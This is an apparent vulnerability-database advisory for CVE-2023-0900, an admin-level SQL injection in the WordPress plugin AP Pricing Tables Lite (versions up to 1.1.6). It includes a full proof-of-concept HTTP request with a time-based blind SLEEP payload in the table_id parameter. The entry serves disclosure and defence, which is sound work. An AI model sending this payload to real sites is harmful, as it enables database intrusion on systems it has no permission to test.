Lucene search
Simone Onofri, Donato OnofriWPEX-ID:F601E637-A486-4F3A-9077-4F294ACE7EA1HistoryMay 10, 2023 - 12:00 a.m.
AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi
2023-05-1000:00:00
Simone Onofri, Donato Onofri
53
ap pricing tables lite
vulnerability
sql injection
admin+
post request
0.012 Low
EPSS
Percentile
85.3%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high-privilege users such as admins.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 115
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://localhost/wp-admin/admin.php?page=ap-pricing-tables-lite
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [Admin+]
Connection: close
action=backend_ajax&_action=copy_table&table_id=124+AND+(SELECT+2035+FROM+(SELECT(SLEEP(10)))A)&_wpnonce=<nonce>Related
wpvulndb
wpvulndb
AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi
2023-05-10 00:00:00
cvelist
cvelist
CVE-2023-0900 AP Pricing Tables Lite <= 1.1.6 - Admin+ SQLi
2023-06-05 13:39:01
nvd
nvd
CVE-2023-0900
2023-06-05 14:15:09
cve
cve
CVE-2023-0900
2023-06-05 14:15:09
prion
prion
Sql injection
2023-06-05 14:15:00
nuclei
nuclei
AP Pricing Tables Lite <= 1.1.6 - SQL Injection
2023-10-17 07:20:28
wordfence
wordfence